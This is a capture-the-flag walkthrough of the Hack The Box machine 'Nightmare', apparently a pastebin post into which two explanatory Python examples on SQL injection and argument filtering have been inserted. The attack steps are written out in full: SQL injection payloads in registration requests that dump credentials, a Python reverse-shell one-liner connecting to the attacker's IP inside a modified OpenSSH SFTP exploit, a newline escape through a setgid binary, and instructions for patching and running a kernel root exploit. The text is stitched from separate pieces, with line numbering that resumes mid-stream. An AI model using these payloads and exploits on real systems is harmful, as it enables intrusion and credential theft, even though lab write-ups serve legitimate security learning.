Hackthebox - Nightmare

a guest
Feb 27th, 2018
Hackthebox
HTB
Nightmare
10.10.10.66

[1] This machine annoyed me, a lot, and the community is full of elitists (you know who you are) who look down on those who want to learn. This guide is to fight back against that poisonous environment for those who want to learn.
[2] I will continue to release these guides whilst that insipid culture exists.
[3] "Every society has the criminals it deserves." Emma Goldman


NMAP -
2 ports
80 and 2222

Focus on port 80 for now.

Register a user using Burp.
http://10.10.10.66/register.php

Intercept the request and modify it to be
user=') union select table_schema,table_name from information_Schema.tables#&pass=pass&register=Register

Log in with:

Username = ') union select table_schema,table_name from information_Schema.tables
Password = pass

Once logged in with the full username above, the SQLi is confirmed to be working.

Now to get credentials.

In Burp create another user:
user=') union select username, password from sysadmin.users#&pass=pass&register=Register

Log in again.

Note the FTP user credentials.
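
The register/login flow above is a second-order injection: the username is accepted at registration and only becomes dangerous when a later page splices the stored value into a query. The Python below is an added example, not the box's PHP, showing that pattern and its fix with bound parameters. It uses sqlite3 so it runs offline, which is why the comment marker is "--" rather than MySQL's "#", the schema table is sqlite_master rather than information_schema, and a constructed "sysadmin" table stands in for sysadmin.users; all table names and rows are constructed.

```python
"""Second-order SQL injection and its parameterised fix.
Added example (not the box's code); schema, rows and payload are constructed."""
import sqlite3


def setup_db():
    """Constructed schema: a notes table the logged-in page queries, and a
    credentials table the application never intends to expose."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users(username TEXT, password TEXT);
        CREATE TABLE notes(owner TEXT, title TEXT, body TEXT);
        CREATE TABLE sysadmin(username TEXT, password TEXT);
        INSERT INTO notes VALUES ('alice', 'todo', 'buy milk');
        INSERT INTO sysadmin VALUES ('ftpuser', 'constructed-ftp-password');
        """
    )
    return conn


def register(conn, username, password):
    """Registration uses a parameterised INSERT, so the payload is stored
    verbatim as an ordinary string; nothing looks wrong at this step."""
    conn.execute("INSERT INTO users VALUES (?, ?)", (username, password))


def notes_for_user_vulnerable(conn, username):
    """The logged-in page builds SQL by string formatting from the stored
    username: this is where the second-order injection fires."""
    query = "SELECT title, body FROM notes WHERE owner = ('%s')" % username
    return conn.execute(query).fetchall()


def notes_for_user_safe(conn, username):
    """Same query with a bound parameter: the username can only ever be data."""
    query = "SELECT title, body FROM notes WHERE owner = (?)"
    return conn.execute(query, (username,)).fetchall()


# Constructed payload with the same shape as the writeup's register request
# (sqlite3 comment syntax instead of MySQL's '#').
PAYLOAD = "') union select username, password from sysadmin--"


def demo():
    """Register the injected username, then read it back through both
    query builders. Returns (vulnerable_rows, safe_rows)."""
    conn = setup_db()
    register(conn, PAYLOAD, "pass")
    stored = conn.execute("SELECT username FROM users").fetchone()[0]
    return notes_for_user_vulnerable(conn, stored), notes_for_user_safe(conn, stored)


if __name__ == "__main__":
    leaked, safe = demo()
    print("string-built query returned:", leaked)
    print("parameterised query returned:", safe)
```

The point of the demo is that escaping or validating at registration is not enough: the stored value is trusted later, so every query that touches user-supplied data must bind it as a parameter.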
  38.  
  39. sftp to the box with the sftp credentials.
  40.  
  41. Try write or read file to /etc/proc
  42. It works!
  43.  
  44. Getting the SSH version
  45.  
  46. SSH-2.0-OpenSSH 32bit (not so recent ver)
  47.  
  48. This is a clue, an old version with a sftp user that can read and write to /etc/proc.
  49.  
  50. Google the below.
  51. sftp misconfig /etc/proc exploit
  52.  
  53. First URL Full Disclosure: OpenSSH <=6.6 SFTP
  54. Use this exploit to get a reverse shell on port 80
  55.  
  56. Change the line "char shell_commands[] =" to be
  57.  
  58. char shell_commands[] = "/usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.x.x\",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subproces
  59. s.call([\"/bin/sh\",\"-i\"]);'&";
  60.  
  61. Compile and execute with a netcat listener on port 80.
  62.  
  63. Initial enumeration is that there is no writeable folders and things are "limited"
  64.  
  65. There is a cron job running every 15 minutes
  66. cat /etc/cron*
  67. */15 * * * * decoder /home/decoder/test/script.sh
  68.  
  69. Looking for the obvious the user in /home is decoder so look for files or directories owned by that user/group id.
  70.  
  71. find / -type f -group decoder 2>/dev/null
  72.  
  73. /usr/bin/sls is found.
  74.  
  75. Investigating this binary
  76.  
  77. ls -lah /usr/bin/sls
  78. -rwxr-sr-x 1 root decoder 8.9K Feb 18 2016 /usr/bin/sls
  79.  
  80. Decoder is the owner and the file has the sgid bit set. Running strings against the file, it runs /bin/ls even more investigating shows there is a filter of escape characters.
  81.  
  82. looking at the man page of ls the escape switch is -b
  83.  
  84. Try.
  85.  
  86. /usr/bin/sls -b $'\n /bin/bash -ip'
  87. id
  88. uid=1002(ftpuser) gid=1002(ftpuser) egid=1001(decoder) groups=1001(decoder),1002(ftpuser)
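
The sls binary above is a setgid wrapper around /bin/ls that tries to filter "escape characters" out of its arguments, and the writeup does not show its source. The Python below is an added example, not the box's code, contrasting a blocklist check of that kind with an allowlist check for a privileged wrapper. It assumes the original wrapper hands argument text to a shell; BLOCKED_CHARS, ALLOWED_FLAGS and SAFE_PATH are constructed for the illustration, and the argument vectors are taken from the writeup's sls invocation.

```python
"""Blocklist versus allowlist argument checking for a setgid ls wrapper.
Added example, not the box's code; the character lists and flag set are
assumptions about what such a wrapper might permit."""
import re
import subprocess

# Constructed blocklist of "escape characters": the kind of check a wrapper
# that later passes its arguments to a shell might rely on.
BLOCKED_CHARS = set("\\`$;|&\"'")

# Constructed allowlist: the only option strings the wrapper will forward, and
# the only characters a path argument may contain (no whitespace, no controls).
ALLOWED_FLAGS = {"-l", "-a", "-h", "-la", "-al", "-lh", "-lah", "-lha"}
SAFE_PATH = re.compile(r"[A-Za-z0-9._/-]+")


def blocklist_filter(args):
    """True if no argument contains a blocked character. A newline is not in
    the list, so a shell-backed wrapper would still see a second command."""
    return all(not (set(a) & BLOCKED_CHARS) for a in args)


def allowlist_check(args):
    """Return (ok, reason). Every argument must be a known flag or a plain path;
    anything else is rejected by name, so unanticipated options like -b and
    arguments carrying control characters never reach ls."""
    for a in args:
        if a in ALLOWED_FLAGS:
            continue
        if a.startswith("-"):
            return False, "option not permitted: %r" % a
        if not SAFE_PATH.fullmatch(a):
            return False, "path contains disallowed characters: %r" % a
    return True, "ok"


def run_ls(args):
    """Run ls only after the allowlist passes, as an argv list with no shell,
    so nothing in the arguments is ever re-parsed as a command."""
    ok, reason = allowlist_check(args)
    if not ok:
        raise ValueError(reason)
    result = subprocess.run(["/bin/ls", *args], capture_output=True, text=True, check=False)
    return result.stdout


if __name__ == "__main__":
    # Argument vector from the writeup's sls invocation, as the wrapper sees it.
    from_writeup = ["-b", "\n /bin/bash -ip"]
    print("blocklist passes it:", blocklist_filter(from_writeup))
    print("allowlist verdict:", allowlist_check(from_writeup))
    print(run_ls(["-la", "."]))
```

The blocklist passes the writeup's arguments because a newline was never on the list; the allowlist rejects them on the first argument without needing to know about that trick, and the argv-list exec means even a permitted argument cannot start a second command.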

Now read user.txt:

cat /home/decoder/user.txt

Coming back to the cron job, we can write files as decoder to the test folder.

ls -lah /home/decoder
drwx-wx--x 2 root decoder 4.0K Feb 25 15:22 test

Looking for kernel exploits.


Google to the rescue:
google -> linux 4.8.0-58-generic exploit
Exploit is found:
https://www.exploit-db.com/exploits/43418/

Download to the local machine.

Analysing the exploit, it is noted that running it as-is will fail: it cannot match the version info because the release file has been changed.

For example:
Line 451 reads the release file
/etc/lsb-release

If the file is examined:
cat /etc/lsb-release
DISTRIB_ID=s390x
DISTRIB_RELEASE=0.1
DISTRIB_CODENAME=bladerunner
DISTRIB_DESCRIPTION="s390x GNU/Linux"

This won't match any of the items in the array at the beginning of the file.

A hacky way to fix this is to reduce the array to only the entry we want.

Change
int kernel = -1;

to be

int kernel = 0;


Delete all array items except the one below, which matches uname -a:

{ "xenial", "4.8.0-58-generic", 0xa5d20, 0xa6110, 0x17c55, 0xe56f5, 0x119227, 0x1b170, 0x439e7a, 0x162622, 0x7bd23, 0x12c7f7, 0x64210, 0x49fa0 },

Now force the exploit to accept this version by commenting out lines 504 and 505:

printf("[-] kernel version not recognized\n");
exit(EXIT_FAILURE);

Compile the exploit and upload it to the server:

gcc 43418.c -o 43418
wget http://10.10.x.x/43418 -O /home/decoder/test/43418
chmod +x /home/decoder/test/43418

Running as the ftpuser with the decoder egid set gives an error:
/home/decoder/test/43418
[.] starting
[.] checking distro and kernel versions
[~] done, versions looks good
[.] checking SMEP and SMAP
[~] done, looks good
[.] setting up namespace sandbox
[-] write_file(/proc/self/set_groups): Permission denied

Exit the egid shell back to the ftpuser shell and run the exploit again.

/home/decoder/test/43418
[.] starting
[.] checking distro and kernel versions
[~] done, versions looks good
[.] checking SMEP and SMAP
[~] done, looks good
[.] setting up namespace sandbox
[~] done, namespace sandbox set up
[.] KASLR bypass enabled, getting kernel addr
[~] done, kernel text: ffffffff98e00000
[.] commit_creds: ffffffff98ea5d20
[.] prepare_kernel_cred: ffffffff98ea6110
[.] SMEP bypass enabled, mmapping fake stack
[~] done, fake stack mmapped
[.] executing payload ffffffff98e17c55
[~] done, should be root now
[.] checking if we got root
[+] got r00t ^_^
root@nightmare:/#

That's all folks.